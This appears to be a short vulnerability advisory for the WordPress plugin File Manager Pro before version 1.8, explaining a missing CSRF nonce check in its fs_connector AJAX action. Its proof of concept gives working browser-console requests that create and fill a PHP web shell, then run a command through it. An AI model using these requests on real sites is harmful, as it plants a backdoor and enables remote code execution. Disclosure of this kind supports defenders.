File Manager Pro < 1.8 - Remote Code Execution via CSRF

Description The plugin does not properly check the CSRF nonce in the fs_connector AJAX action. This allows attackers to make highly privileged users perform unwanted file system actions via CSRF attacks by using GET requests, such as uploading a web shell.

PoC

As a Super Admin, run the following code in the browser console (note that the requests do not require nonces): await fetch( “/wp-admin/admin-ajax.php?action=fs_connector&cmd;=mkfile&name;=shell.php&target;=l1_Lw” ); await fetch( “/wp-admin/admin-ajax.php?action=fs_connector&cmd;=put&target;=l1_c2hlbGwucGhw&content;=%3C?php%20echo%20system($_REQUEST%5B’cmd’%5D);” ); Now a logged-out attacker may access shell.php as follows: await (await fetch( “/shell.php?cmd=id” ) ).text()